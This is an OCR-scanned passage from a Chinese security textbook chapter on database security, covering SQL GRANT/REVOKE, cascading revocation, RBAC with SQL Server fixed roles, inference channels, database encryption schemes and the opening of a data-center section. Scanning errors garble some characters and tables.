还 可 以 对 其 他 用 户 授予 和 回收 授权 的 权利 ， 以 允许 他 们 对 该 表 授 予 和 回收 访问 权 。 

和 任何 其 他 访问 控制 系统 一 样 ， 数 据 库 访问 控制 系统 区 分 不 同 的 访问 权 ， 包 括 创建 、 插 
A, HHA. BR. RNS. AHR AEA (DBMS) 还 就 访问 权 的 粒度 提供 了 相当 多 的 
控制 。 访 问 权 可 以 是 对 整个 数据 库 的 、 对 单个 表 的 或 者 对 表 中 选 定 的 行 或 列 的 。 访 问 权 还 可 以 
由 表 项 的 内 容 确定 。 例 如 ， 在 人 事 数 据 库 中 ， 某 些 用 户 可 能 被 限制 只 能 看 到 某 个 最 大 值 以 内 的 
工资 信息 。 部 门 经 理 可 能 仅 被 允许 看 到 他 所 管理 的 部 门 的 职工 的 工资 信息 。 


5.5.1 基于 SQL 的 访问 定义 


SQL 提供 了 用 于 管理 访问 权 的 两 个 命令 一 一 GRANT HI REVOKE, XF SQL 的 不 同 版 本 ， 
它们 的 语法 稍 有 不 同 。GRANT 命令 一 般 具有 下 面 的 语法 形式 : 


GRANT { privileges | role } 

[ON table] 

TO {user | role | PUBLIC} 
[IDENTIFIED BY password] 

[WITH GRANT OPTION] 


这 个 命令 可 以 用 来 授予 一 个 或 多 个 访问 权 或 者 为 用 户 分 配角 色 。 对 于 访问 权 ， 可 以 使 用 该 
命令 的 选项 来 指定 其 作用 的 表 。TO 子 句 指定 了 权限 被 授予 的 用 户 或 角色 。PUBLIC 值 表示 任 
何 用 户 都 有 指定 的 访问 权 。 可 选 的 IDENTIFIED BY 子 句 指定 了 回收 这 条 GRANT 命令 的 访问 
权时 必须 使 用 的 口令 。GRANT OPTION 表示 通过 使 用 或 不 使 用 授权 选项 来 确定 被 授权 者 是 否 
可 以 再 给 其 他 用 户 授权 。 | 

作为 一 个 简单 的 例子 ， 考 虑 下 面 的 语句 : 

GRANT SELECT ON ANY TABLE TO ricflair 


这 条 语句 使 得 用 户 ricflair 可 以 查询 数据 库 中 的 任何 表 。 
SQL 的 不 同 实现 提供 了 不 同 的 访问 权 。 下 面 是 典型 的 访问 权 列 表 : 


日 ”使 用 的 语法 定义 约定 如 下 : 用 竖 线 分 开 的 元 素 是 并 列 的 选项 ， 从 中 选 一 个 ; 一 组 选项 用 花 括 号 括 起 来 ; 方 
括号 里 面 是 可 选 的 元 素 ， 也 就 是 说 ， 方 括号 里 面 的 元 素 可 以 出 现 ， 也 可 以 不 出 现 。 
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Select: 被 授权 者 可 以 读 取 整 个 数据 库 、 单 个 表 或 者 表 中 的 指定 列 。 
Insert: 被 授权 者 可 以 在 表 中 插入 完整 的 行 或 者 插入 仅 对 特定 列 赋值 的 行 。 
Update: 语义 类 似 于 INSERT. 

Delete: 被 授权 者 可 以 删除 表 中 的 行 。 

References: 人 允许 被 授权 者 定义 参照 本 表 指 定 的 列 的 另 一 个 表 的 外 键 。 
REVOKE 命令 的 语法 如 下 : 


REVOKE { privileges | role } 
[ON table] 
FROM {user | role | PUBLIC} 


因此 ， 可 以 用 下 面 的 语句 回收 前 面 例子 中 的 访问 权 : 
REVOKE SELECT ON ANYTABLE FROM ricflair 


5.5.2 ”级 联 授权 


授权 选项 〈grant option) 使 得 访问 权能 够 级 联 到 很 多 用 户 。 我 们 分 析 图 5-6 中 的 访问 权 来 
说 明 级 联 现象 。 该 图 表明 Ann 在 t= 10 时 刻 授予 Bob 访问 权 ， 又 在 t=20 时 刻 给 Chris 授权 . 
假设 授权 选项 总 被 使 用 ， 那么 ，Bob 能 够 在 :一 30 时 刻 给 David 授权 。Chris 在 t=50 时 刻 也 给 
David 授权 。 其 间 ，David 给 Ellen 授权 ，Ellen 又 给 Jim 授权 ; 随后 David 又 给 Frank 授权 。 





图 5-6 Bob 收回 David 的 权限 

与 使 用 授权 选项 可 以 将 授权 从 一 个 用 户 级 联 到 另 一 个 用 户 一 样 ， 回 收 权 也 能 级 联 。 于 是 ， 
如 果 Ann 回收 Bob Al Chris 的 访问 权 ， 那 么 David、Ellen、Jim 和 Frank 的 访问 权 也 被 回收 . 
更 复杂 的 情况 是 一 个 用 户 多 次 得 到 同样 的 访问 权 ， 就 像 这 个 例子 中 的 David 一 样 。 假 如 Bob 
收回 David 的 权限 ， 由 于 David 在 t=50 时 刻 得 到 Chris 的 授权 ， 所 以 他 依然 拥有 访问 权 。 然 
ii, David 给 Ellen 授权 发 生 在 从 Bob 处 得 到 具有 授权 选项 的 授权 之 后 、 从 Chris 处 得 到 授权 
之 前 。 大 多 数 SQL 实现 规定 ， 在 这 种 情况 下 ， 当 Bob 收回 David 的 访问 权时 ，Ellen 以 及 Jim 
的 访问 权 也 被 收回 。 这 是 因为 在 t=40 时 刻 ，David 给 Ellen 授权 ， 此 时 David 仅 从 Bob 处 得 
到 融 授 权 选 项 的 授权 。 当 Bob 收回 权限 时 ， 导 致 后 面 所 有 经 由 David 传递 并 且 仪 能 回潮 到 Bob 
的 级 联 授 权 也 被 收回 。 因 为 David 给 Frank 授权 是 在 其 从 Chris 处 得 到 具有 授权 选项 的 授权 之 
后 ， 所 以 Frank 的 访问 权 被 保留 。 该 结果 反映 在 图 5-6 的 下 半 部 分 。 

一 般 地 ， 大 多 数 实现 遵循 如 下 约定 : 当 用 户 A 收回 访问 权时 ， 级 联 的 访问 权 也 被 收回 ， 
除非 即使 没有 最 初 A 的 授权 ， 访问 权 也 存在 。 这 个 约定 首先 在 [GRIF76] 中 提出 。 
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5.5.3 ”基于 角色 的 访问 控制 


基于 角色 的 访问 控制 (Role-Based Access Control, RBAC) 方案 自然 适合 于 数据 库 访 问 控 
制 。 数 据 库 系统 不 像 与 单个 或 几 个 应 用 关联 的 文件 系统 ， 经 常 要 文 持 许 多 应 用 。 在 这 种 环境 
F, 一 个 用 户 要 用 很 多 应 用 来 完成 很 多 任务 ， 每 个 任务 都 要 求 它 自己 的 特权 集 。 直 接 把 完成 所 
有 任务 所 需 的 所 有 访问 权 都 授予 用 户 是 很 糟糕 的 管理 方式 。RBAC 提供 了 一 种 既 能 减轻 管理 员 
负担 又 能 提高 安全 性 的 手段 。 
在 自主 访问 控制 环境 下 ， 我 们 可 以 把 数据 库 用 户 分 成 三 大 类 : 
e 应 用 程序 属 主 (application owner): 拥有 数据 库 对 象 ( 表 、 列 、 行 ) 并 将 其 作为 应 用 程 
序 一 部 分 的 终端 用 户 。 也 就 是 说 ， 数 据 库 对 象 是 由 应 用 程序 产生 或 者 准备 让 应 用 程序 
使 用 的 。 

e 应 用 程序 属 主 外 的 终端 用 户 (end user other than application owner): 不 拥有 任何 数据 库 
对 象 但 可 通过 一 个 应 用 程序 操作 数据 库 对 象 的 终 问 用 户 。 

e 管理 员 (administrator): 对 数据 库 的 整体 或 者 部 分 负 有 管理 职责 的 用 户 。 

我 们 可 以 针对 这 三 种 类 型 的 用 户 对 RBAC 进行 一 些 总 体 说 明 。 一 个 应 用 程序 和 大 量 任 务 
联系 在 一 起 ， 每 个 任务 对 于 数据 库 的 一 部 分 要 求 有 特定 的 访问 权 。 对 于 每 个 任务 ， 可 以 定义 一 
个 或 多 个 角色 来 指定 所 需 的 访问 权 。 应 用 程序 属 主 可 以 给 终端 用 户 分 配角 色 。 管 理 员 负责 更 敏 
感 或 更 通用 的 角色 ， 这些 角色 与 管理 物理 和 逻辑 数据 库 组件 (如 数据 文件 、 用 户 和 安全 机 制 ) 
有 关 。 系 统 赋 予 某 些 管理 员 某 些 特权 。 管 理 员 又 能 给 用 户 分 配 与 管理 相关 的 角色 。 

数据 库 的 RBAC 机 制 应 该 提供 以 下 能 力 : 

e 创建 和 删除 角色 。 

e 定义 角色 的 许可 。 

e 分 配 和 取消 用 户 到 角色 的 分 配 。 

在 数据 库 安 全 方面 运用 角色 的 一 个 很 好 例子 是 Microsoft SQL Server 提供 的 RBAC 机 制 。 
SQL Server 支持 三 种 类 型 的 角色 : 服务 磊 角 色 、 数 据 库 角 色 和 用 户 定 义 的 角色 。 前 两 种 类 型 的 
角色 被 称 为 固定 角色 ( 详 见 表 5-2 )， 这 些 角色 是 系统 预先 配置 的 ， 具 有 特定 的 访问 权 。 管 理 员 
或 普通 用 户 不 能 添加 、 删 除 或 修改 固定 角色 ， 只 能 为 用 户 添 加 和 删除 固定 角色 的 成 员 资 格 。 

固定 服务 器 角色 (fixed server role) 定义 在 服务 硕 级 ， 独 立 于 任何 用 户 数据 库 而 存在 。 该 
类 角色 被 设计 用 来 减轻 管理 工作 量 。 它 们 具有 不 同 的 许可 ， 旨 在 提供 分 散 管 理 职责 的 能 力 而 不 
放弃 完全 控制 。 数 据 库 管理 员 可 以 使 用 这 些 固 定 角色 给 各 种 人 员 分 配 不 同 的 管理 任务 ， 并 仅仅 
授予 他 们 必须 具备 的 权限 。 

固定 数据 库 角色 (fixed database role) 运行 于 单独 的 数据 库 级 。 有 些 固 定数 据 库 角色 ， 如 
db_accessadmin 和 db_secutityadmin, ， 和 固定 服务 器 角色 一 样 ， 被 设计 通过 委托 的 管理 职责 来 
帮助 DBA。 其 他 和 角色， 如 db datareader 和 db datawriter， 被 设计 成 为 终端 用 户 提供 一 组 许可 。 

SQL Server 允许 用 户 创建 角色 。 这 些 用 户 定 义 的 角色 (user-defined role) 被 分 配对 数据 库 
一 部 分 的 访问 权 。 具 有 适当 授权 的 用 户 (典型 地 ， 被 分 配 db_securityadmin 角色 的 用 户 ) 可 以 
定义 新 的 角色 和 与 该 角色 关联 的 访问 权 。 用 户 定义 的 角色 有 两 种 类 型 : 标准 角色 和 应 用 程序 角 
色 。 对 于 标准 角色 ， 被 授权 用 户 可 以 给 其 他 用 户 分 配角 色 。 应 用 程序 角色 需要 口令 ， 其 与 应 用 
程序 关联 而 不 与 用 户 组 关联 。 它 要 求 口令 。 角 色 在 应 用 程序 执行 适当 的 代码 时 被 激活 。 有 权 访 
问 应 用 程序 的 用 户 能 够 使 用 应 用 程序 角色 访问 数据 库 。 数 据 库 应 用 程序 经 常 强 制 要 求 它 目 己 的 
安全 性 建立 在 应 用 程序 逻辑 之 上 上。 例如， 你 可 以 使 用 具有 口令 的 应 用 程序 角色 来 允许 某 个 用 户 
仅 在 特定 的 几 小 时 之 内 获取 或 修改 任何 数据 。 因 此 ， 通 过 应 用 程序 逻辑 ， 你 能 实现 更 复杂 的 安 
全 管理 。 
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表 5-2 Microsoft SQL Server 中 的 固定 角色 


sysadmin 
serveradmin 
setupadmin 
securityadmin 
角色 processadmin 
dbcreator 
diskadmin 
bulkadmin 
db owner 
db_accessadmin 
db datareader 


a 团 

rs 

a i 
$ 
m 


固定 db_datawriter 
数据 库 db ddladmin 


角色 db_securityadmin 
db_backupopoerator 
db_denydatareader 
db_denydatawriter 
5.6 ”推理 


许 可 
可 以 执行 SQL Server 中 的 任何 活动 ， 对 所 有 数据 库 功 能 具有 完全 控制 
可 以 设置 服务 器 范围 的 配置 选项 ， 关 闭 服务 器 
可 以 管理 链接 服务 器 和 启动 过 程 
可 以 管理 登录 和 CREATE DATABASE 权限 ， 还 可 以 读 取 错误 日 志和 修改 口令 
可 以 管理 在 SQL Server 中 运行 的 进程 
可 以 创建 、 修 改 和 删除 数据 库 
可 以 管理 磁盘 文件 
可 以 执行 BULK INSERT 语句 
具有 数据 库 的 所 有 权限 
可 以 添加 、 删 除 用 户 ID 
可 以 选择 数据 库 中 任何 用 户 表 的 所 有 数据 
可 以 修改 数据 库 中 任何 用 户 表 的 任何 数据 
可 以 执行 所 有 的 数据 定义 语言 (DDL) 语句 
可 以 管理 所 有 的 许可 、 对 象 所 有 权 、 角 色 和 角色 成 员 资 格 
可 以 执行 DBCC、CHECKPOINT 和 BACKUP 语句 
没有 在 数据 库 中 选择 数据 的 权限 
没有 在 数据 库 中 修改 数据 的 权限 


推理 与 数据 库 安 全 相关 ， 是 完成 授权 查询 并 从 得 到 的 合法 啊 应 中 推 寻 出 非 授权 信息 的 过 
程 。 推 理 问题 产生 于 大 量 数据 项 的 组 合 比 单独 一 个 数据 项 更 加 敏感 的 情况 ， 或 者 可 以 通过 数 
据 项 组 合 推断 出 敏感 程度 更 高 的 数据 的 情况 。 图 5-7 说 明了 这 个 过 程 。 攻 击 者 可 以 利用 非 敏 
感 数据 及 元 数据 (metadata)。 元 数据 指 有 关 数 据 项 之 间 相 关 性 或 依赖 性 的 知识 ， 可 以 用 来 推 
导出 某 个 用 户 不 能 用 其 他 方式 获得 的 信息 。 获 得 非 授 权 数 据 的 信息 传送 路 径 被 称 为 推理 通道 


(inference channel) 。 





非 授权 访问 


图 5-7 经 由 推理 通道 的 间接 信息 访问 


一 般 来 说 ， 可 以 用 两 种 推理 技术 推导 出 额外 信息 : OT ea S E TE] FY PRK 
依赖 ; 合并 具有 相同 约束 的 视图 。 

后 者 的 一 个 例子 如 图 5-8 所 示 ， 此 图 说 明了 推理 问题 。 图 5-8a 显示 了 具有 4 列 的 
Inventory 表 。 图 5-8b 显示 了 两 个 视图 ， 用 SQL 语句 定义 如 下 : 


CREATE view V1 AS CREATE view V2 AS 

SELECT Availability, Cost SELECT Item, Department 

FROM Inventory FROM Inventory fi 
WHERE Department = “hardware” WHERE Department = “hardware” 166 


这 两 个 视图 的 用 户 没 被 授权 访问 Item 和 Cost 之 间 的 关系 。 能 够 访问 其 中 一 个 视图 或 两 个 
视图 的 用 户 都 不 能 根据 函数 依赖 推导 出 二 者 的 关系 。 也 就 是 说 ,在 Item 和 Cost 之 间 不 存在 也 
数 依赖 ， 因 而 不 能 在 已 知 Item (可 能 还 有 其 他 信息 ) 的 情况 下 就 足够 推出 Cost。 然 而 ， 假 设 这 
两 个 视图 是 根据 Item 和 Cost 不 能 一 起 访问 的 访问 约束 来 创建 的 。 那 么 ， 了 解 Inventory 表 结 构 
并 知道 视图 表 保 持 Inventory 表 的 行 序 的 用 户 ， 就 可 以 合并 这 两 个 视图 ， 构 造 出 如 图 $-8c 所 示 
的 表 。 这 就 违反 了 不 允许 泄露 Item 和 Cost 属性 之 间 关 系 的 访问 控制 策略 。 


Shelf support 
Lid support hard 


| Item | Availability | Cost $) 
Shelf support 
c) 从 组 合 查询 应 答 推 导出 的 表 


图 $-8 推理 的 实例 


一 般 来 说 ， 有 两 种 方法 处 理由 推理 造成 的 信息 泄露 威胁 : 
e 数据 库 设 计时 的 推理 检测 : 这 种 方法 通过 修改 数据 库 结构 或 改变 访问 控制 机 制 等 手 
段 消除 推理 通道 来 防止 推理 。 其 实例 包括 将 一 个 表 分 成 多 个 表 以 除去 数据 依赖 或 者 在 
RBAC 方案 中 使 用 更 细 粒 度 的 访问 控制 角色 。 这 类 技术 和 常常 导致 不 必要 的 更 严格 的 访 
问 控制 ， 从 而 降低 了 可 用 性 。 
e 查询 时 的 推理 检测 : 这 种 方法 寻求 在 一 个 查询 或 一 系列 查询 执行 期 间 消 除 推理 通道 违 
例 。 如 果 发 现 了 推理 通道 ， 查 询 就 被 拒绝 或 修改 。 167 
对 于 上 面 的 任何 一 种 方法 ， 都 需要 推理 检测 算法 。 这 是 个 很 复杂 的 问题 ， 仍 在 研究 当中 。 
为 了 体会 其 难度 ， 我 们 给 出 摘自 [LUNT89] 的 一 个 例子 。 考 虑 一 个 包含 人 事 信 息 (包括 姓名 、 
地 址 和 职工 工资 ) 的 数据 库 。 单 独 的 姓名 、 地 址 和 工资 信息 可 以 被 下 级 角色 (如 Clerk) 访问 ， 





116 BQ tEMKARKAREL 


但 姓名 和 工资 之 间 的 联系 则 被 限制 仅 能 由 上 级 角色 (如 Administrator) 访问 。 这 与 图 5-8 说 明 
的 问题 类 似 。 这 个 问题 的 一 种 解决 方案 是 构造 包含 如 下 信息 的 三 个 表 : 

Employees (Emp#, Name, Address) 

Salaries (S#, Salary) 

Emp-Salary (Emp#, S#) 

其 中 每 行 由 表 名 及 随后 的 列 名 清单 组 成 。 在 这 个 例子 中 ， 每 个 职工 被 分 配 了 唯一 的 职工 号 
(Emp#) 和 唯一 的 工资 号 ( S#)。Employees 表 和 Salaries 表 对 Clerk 角色 是 可 访问 的 ,但 Emp- 
Salary 表 仅 对 Administrator 角色 是 可 访问 的 。 在 这 个 结构 中 ， 职工 和 工资 之 间 的 敏感 关系 是 受 
保护 的 ， 被 分 配 Clerk 角色 的 用 户 不 能 访问 。 现 在 假定 我 们 想 添加 一 个 新 的 不 敏感 属性 一 一 职 
工 开始 工作 日 期 。 将 其 添加 到 Salaries 表 ， 如 下 所 示 : 

Employees (Emp#, Name, Address) 

Salaries (S#, Salary, Start-Date) 

Emp-Salary (Emp#, S#) 

然而 ， 职 工 的 开始 工作 日 期 是 职工 的 一 个 易于 被 观察 或 发 现 的 属性 。 因 而 ， 属 于 Clerk f 
色 的 用 户 便 可 推理 出 (或 部 分 推理 出 ) 职工 的 名 字 。 这 将 泄露 职工 和 工资 之 间 的 关系 。 直 接 除 
去 推理 通道 的 方法 是 将 Start-Date 列 加 到 Employees 表 ， 而 不 是 加 到 Salaries 表 。 

这 个 样 例 中 指出 的 第 一 个 安全 问题 是 职工 和 工资 之 间 的 关系 可 能 被 推理 出 ， 这 可 以 通过 分 
析 数 据 结构 和 DBMS 可 用 的 安全 约束 检测 出 来 。 然 而 ， 将 Start-Date 列 加 到 Salaries 表 产 生 的 
第 二 个 安全 问题 ， 不 可 能 仅 用 存储 在 数据 库 中 的 信息 检测 出 来 ， 特 别 是 对 于 数据 库 本 喘 ， 不 能 
根据 职工 开始 工作 日 期 推理 出 职工 姓名 。 

对 于 关系 数据 库 的 一 般 情 形 ， 推 理 检测 是 一 个 非常 复杂 和 困难 的 问题 。 对 于 第 27 章 讨论 
的 多 级 安全 数据 库 和 下 一 节 讨 论 的 统计 数据 库 ， 在 设计 具体 技术 方面 已 经 取得 了 一 些 进展 。 


5.7 ”数据 库 加 密 


数据 库 对 于 任何 组 织 来 说 都 是 最 宝贵 的 信息 源 ， 因 此 被 多 级 安全 保护 ， 包 括 防火 墙 、 鉴 
别 机 制 、 通 用 访问 控制 系统 和 数据 库 访问 控制 系统 。 此 外 ， 对 于 某 些 敏感 数据 ， 要 求 数 据 库 加 
密 ， 而 且 加 密 也 通常 被 实现 。 加 密 成 为 数据 库 安 全 的 最 后 一 道 防 线 。 
数据 库 加 密 在 以 下 两 方面 存在 缺点 : 
e 密 钥 管理 (key management): 授权 用 户 必须 能 够 访问 其 被 允许 访问 的 数据 的 解密 密 钥 。 
由 于 数据 库 一 般 可 供 大 量 用 户 和 众多 应 用 访问 ， 为 授权 的 用 户 和 应 用 提供 数据 库 选 定 
部 分 的 安全 密 钥 是 一 项 复杂 的 工作 。 
© 不 灵活 (inflexibility): 当 数 据 库 的 部 分 或 全 部 被 加 密 时 ， 执 行 记录 搜索 变 得 更 为 困难 . 
加 密 可 以 在 记录 级 (加 密 选 定 的 记录 )、 属 性 级 (加密 选 定 的 列 ) 或 单个 字段 级 运用 到 整个 
数据 库 。 
许多 方法 已 被 应 用 于 数据 库 加 密 。 本 节 中 ， 我 们 分 析 多 用 户 数据 库 的 一 种 典型 方法 。 
DBMS 是 硬件 和 软件 的 复杂 集合 。 它 需要 很 大 的 存储 容量 ， 并 需要 熟练 的 工作 人 员 完 成 
维护 、 灾 难保 护 、 更 新 与 安全 等 工作 。 对 于 很 多 小 型 和 中 型 组 织 ， 一 个 有 吸引 力 的 解决 方案 
是 从 服务 提供 商 处 外 购 DBMS 和 数据 库 。 服 务 提 供 商 远程 维护 数据 库 ， 其 可 以 提供 高 可 用 性 、 
灾难 预防 和 高 效 访问 与 更 新 。 在 这 个 解决 方案 中 ， 主 要 需要 关心 数据 的 机 密 性 。 
这 个 安全 问题 的 直接 解决 方法 是 加 密 整 个 数据 库 ， 并 且 不 同 服务 提供 商 提 供 加 密 / 解密 密 
钥 。 这 个 解决 方案 本 身 很 不 灵活 。 用 户 具 有 有 限 的 能 力 在 搜索 或 索引 密 钥 参数 的 基础 上 访问 一 
个 数据 项 ， 但 必须 从 数据 库 中 下 载 全 部 表 ， 解 密 这 些 表 ， 再 对 结果 进行 处 理 。 为 了 提供 更 好 的 
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灵活 性 ， 必 须 能 够 直接 对 加 密 形 式 的 数据 库 进 行 处 理 。 
[DAMI05] 和 [DAMI03] 介绍 了 采用 这 种 方法 的 一 个 例子 ， 如 图 5-9 所 示 。[HACI02] 也 描 
述 了 一 种 类 似 的 方法 。 其 中 涉及 四 种 实体 : 
o 数据 主 (data owner): 对 于 组 织 内 部 或 外 部 的 用 户 ， 产 生 版 本 可 控 的 数据 的 组 织 。 
e FAR (user): 对 系统 提出 请 求 (查询 ) 的 人 实体 (human entity)。 用 户 可 以 是 组 织 内 部 的 职 
工 ， 被 授权 通过 服务 器 访问 数据 库 ; 或 者 是 组 织 外 部 的 人 ， 经 鉴别 之 后 被 授予 访问 权 。 
e 客户 端 (client); 把 用 户 查询 转换 为 在 服务 器 中 加 密 存储 的 查询 的 前 端 。 
e 服务 器 (server): 接收 来 自 数 据 主 的 加 密 数 据 并 分 发 给 客户 端的 组 织 。 服 务 器 可 以 实际 
被 数据 主 拥有 ， 但 更 多 情况 下 它 是 被 外 部 提供 者 拥有 并 维护 的 设施 。 
让 我 们 首先 分 析 基 于 这 个 情景 的 最 简单 的 可 能 安排 。 假 设 数据 库 中 的 每 个 项 使 用 相同 的 加 
密 密 钥 分 别 加 密 。 加 密 的 数据 库存 储 在 服务 器 中 ， 但 由 于 服务 器 没有 密 钥 ， 所 以 数据 在 服务 器 
中 是 安全 的 。 即 使 有 人 能 够 攻 入 服务 硕 系 统 ， 他 能 够 访问 的 也 都 是 加 密 的 数据 。 客 户 端 系 统 拥 
有 加 密 密 钥 的 副本 。 客 户 端的 用 户 可 以 按照 下 面 的 顺序 从 数据 库 中 检索 记录 : 
1. 用 户 发 布 一 条 SQL 查询 ， 请 求 主键 具有 特定 值 的 一 条 或 多 条 记录 的 字段 。 
2. 客户 闪 的 查询 处 理 需 加 蜜 主键 ， 并 相应 地 修改 SQL 查询 ， 进 而 把 查询 传送 给 服务 器 。 
3. 服务 需 处 理 主键 被 加 密 的 查询 ， 返 回 正确 的 记录 。 
4. 查 询 处 理 需 解密 数据 并 返回 结果 。 


产 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 
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图 5-9 ”一 种 数据 库 加 密 方案 
例如 ， 考 虑 5.1 节 基 于 图 5-4a 中 数据 库 提出 的 查询 : 


SELECT Ename, Eid, Ephone 
FROM Employee 
WHERE Did = 15 
假定 使 用 加 密 密 钥 k, WTS 15 的 加 密 值 为 E(k, 15) 二 1000110111001110。 那 么 客户 端的 
查询 处 理 希 将 上 面 的 查询 变换 为 : 
SELECT Ename, Eid, Ephone 


FROM Employee 
WHERE Did = 1000110111001110 


这 种 方法 非常 直接 ， 但 正如 前 面 提 到 的 ， 缺 乏 灵活 性 。 例 如 ， 假 设 Employee RAF 
工资 属性 ， 并 且 用 户 想 要 检索 工资 少 于 $70K 的 所 有 记录 。 因 为 每 条 记录 的 工资 属性 值 都 
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是 加 密 的 ， 所 以 没有 显而易见 的 方法 实现 这 个 要 求 。 加 密 值 的 集合 不 再 保持 原始 属性 值 的 
排列 次 序 。 

为 了 提供 更 好 的 灵活 性 ， 可 以 采用 下 面 的 方法 。 将 数据 库 中 表 的 每 条 记录 ( 行 ) 按 块 加 
密 。 参 考 图 5-3 中 关系 数据 库 的 抽象 模型 ， 可 将 每 行 R; 看 作 一 个 连续 的 块 B= 二 xa || x | 
xim)。 这 样 ，R; 中 的 每 个 属性 值 不 管 是 文本 类 型 还 是 数值 类 型 都 被 看 作 比 特 序 列 ， 该 行 的 所 有 
属性 值 连接 起 来 形成 一 个 二 进 制 块 。 将 整 行 加 密 ， 表 示 为 E(k, B)=E(k, (xa || x2 lll xim))。 为 
了 支持 数据 检索 ， 每 个 表 都 与 属性 索引 关联 。 对 属性 中 的 部 分 或 全 部 创建 索引 值 。 对 于 未 加 密 
数据 库 中 的 每 行 R, WATAN FAT (ILEI 5-10 ): 

(2 





B=(xa || Xall *** || Xia) 


图 5-10 图 5-3 中 数据 库 的 加 密 方案 


对 于 原始 数据 库 中 的 每 行 ， 在 加 密 后 的 数据 库 中 都 有 与 其 对 应 的 一 行 。 其 中 的 索引 值 用 来 
提供 对 数据 检索 的 支持 。 我 们 可 以 按 如 下 方式 操作 。 对 于 每 个 属性 ， 将 属性 值 域 分 为 一 组 不 重 
合并 包括 所 有 可 能 值 的 分 块 ， 并 给 每 个 分 块 指派 一 个 索引 值 。 

K 5-3 给 出 了 这 种 映射 的 一 个 实例 。 假 设 职工 ID (eid) 的 取 值 范围 为 [1, 1000]。 我 们 将 
这 些 值 划分 为 5 个 分 块 : [1, 200], [201, 400], [401, 600], [601, 800] 和 [801, 1000]， 然 后 
分 别 指派 索引 值 1、2、3、4 和 5。 对 于 文本 字段 ， 可 以 从 属性 值 的 首 字母 得 出 索引 。 例 如 ， 
对 于 属性 ename， 我 们 可 以 规定 以 A 或 B 开 头 的 值 的 索引 为 1， 以 C 或 D 开头 的 值 的 索引 
为 2， 依 此 类 推 。 对 每 个 属性 采用 类 似 的 划分 方案 。 表 5-3b 给 出 了 结果 表 。 第 一 列 中 的 值 表 
示 每 行 的 加 密 值 ， 其 实际 值 依赖 于 加 密 算法 和 加 密 密 钥 。 剩 余 列 给 出 相应 属性 值 的 索引 值 。 
属性 值 与 索引 值 之 间 的 映射 函数 构成 了 元 数据 ， 存 储 在 客户 端 和 数据 主 处 ,而 不 存储 在 服务 
AEN o 


表 5-3 加密 数 据 库 举例 


a) Employee # 

oo Te 

23 Tom TOK | Maple | 45 

860 My OK | Min | 83 

320 hn SK | River 50 

875 Ooo ey | SK | Hopewell O 92 

b) 具有 索引 的 加 密 的 Employee # 

E (k, B) | (did) 
T e E N a A 
0111000111001010 | s5 f 7 | 2 | 7 8 
1100010010001101: | 2 J 5 | 1 | 9 | 5 
onounuo | s5 | 5 | 2 | 4&4 | 9 
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这 种 安排 提供 了 更 高 效 的 数据 检索 。 例 如 ， 假 设 一 个 用 户 请 求 sid<300 的 所 有 职工 的 记 
录 。 查 询 处 理 需 请 求 所 有 I(eid)=2 的 记录 。 服 务 器 返回 这 些 记 录 。 查 询 处 理 吉 解密 返回 的 所 
有 行 ， 丢 弃 不 匹配 原始 查询 的 记录 ， 将 被 请 求 的 未 加 密 数 据 返 回 给 用 户 。 

刚才 描述 的 索引 方案 恰好 给 攻击 者 提供 了 一 定数 量 的 信息 ， 就 是 按 指定 属性 排列 的 行 的 
大 致 相对 次 序 。 为 了 隐藏 这 些 信 息 ， 可 以 将 索引 的 次 序 随机 排列 。 例 如 ，eid 的 值 可 以 通过 将 
[1,200]. [201,400]. [401, 600] 、[601, 800] 和 [801, 1000] 分 别 映射 到 2、3、5、1 和 4 来 划分 。 
因为 元 数据 并 未 存储 在 服务 器 端 ， 所 以 攻击 者 不 能 从 服务 器 获得 这 些 信 息 。 

还 可 以 将 其 他 特征 加 到 这 个 方案 中 。 为 了 提高 通过 主键 访问 记录 的 效率 ， 系 统 可 以 使 用 主 
键 属性 值 的 加 密 值 或 散 列 值 。 在 任 一 种 情况 下 ， 对 应 主键 值 的 行 都 可 以 被 单独 检索 。 数 据 库 的 
不 同 部 分 可 以 用 不 同 的 密 钥 加 密 ， 因 此 用 户 只 能 访问 其 拥有 解密 密 钥 的 那 一 部 分 。 后 一 种 方案 
可 以 与 基于 角色 的 访问 控制 系统 结合 起 来 使 用 。 
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数据 中 心 是 一 个 容纳 了 大 量 服务 器 、 存 储 设备 、 网 络 交换 机 和 装备 的 企业 设施 。 一 个 数据 
中 心 内 的 服务 硕 和 存储 设备 数量 可 能 会 达到 数 万 。 这 些 使 用 大 型 数据 中 心 的 例子 包括 云 服务 提 
供 者 、 搜 索引 擎 、 大 型 科学 研究 设施 和 大 型 企业 的 I 开 设施 等 。 一 个 数据 中 心 通常 包括 元 余 或 
备份 电源 、 元 余 网 络 连接 、 环 境 控制 〈 例 如， 空调 的 统一 控制 以 及 火灾 的 预防 与 扑救 )， 以 及 
多 种 安全 设备 。 运 行 大 型 数据 中 心 所 使 用 的 电量 有 时 与 一 个 小 城镇 所 耗 规模 差不多 。 一 个 数据 
中 心 可 以 占据 一 整 间 房 间 、 一 个 或 多 个 楼 层 ， 其 至 整个 建筑 物 。 


5.8.1 数据 中 心 要 素 


图 5-11 展示 了 一 个 大 型 数据 中 心 所 配备 的 关键 要 素 。 大 型 数据 中 心 内 的 大 部 分 设备 
是 安装 在 开放 式 机 架 或 机 柜 中 的 大 量 服 务 絮 存储 模块 ， 这 些 模 块 通常 以 过 道 间 隔 、 单 行 放 
置 。 这 种 排列 方式 允许 维护 人 员 访 问 机 架 或 机 柜 中 的 每 一 台 设 备 。 通 常 来 讲 ， 单 个 模块 装配 有 
10Gbps 或 40Gbps 以 太 网 接口 ， 以 便 处 理发 往 服务 咒 或 从 服务 器 发 出 的 大 量 流量 。 此 外 ， 通 
常情 况 下 每 个 机 架 具 有 一 个 或 两 个 10Gbps、40Gbps 或 100Gbps 以 太 网 交换 机 ， 以 连接 所 有 
服务 器 并 提供 与 数据 中 心 其 他 部 分 的 连接 。 交 换 机 通常 挂 在 机 架 上 ， 并 被 称 为 ToR ( Top-of- 
Rack) 交换 机 。ToR 交换 机 与 服务 器 接 和 人 交换 机 是 同 义 的 ， 即 使 其 并 不 一 定 置 于 “机 架 顶 端 ”。 
超大 规模 数据 中 心 (如 云 服务 提供 者 ) 需要 交换 机 在 100Gbps 的 传输 速度 下 运行 ， 从 而 支持 服 
务 器 机 架 的 相互 连接 ， 并 为 通过 路 由 器 或 防火 墙 上 的 网 络 接口 卡 (NIC) 连接 外 部 提供 足够 的 
交互 能 力 。 
在 图 5-11 中 未 展示 的 关键 要 素 是 电缆 (cabling) MELEAR: 
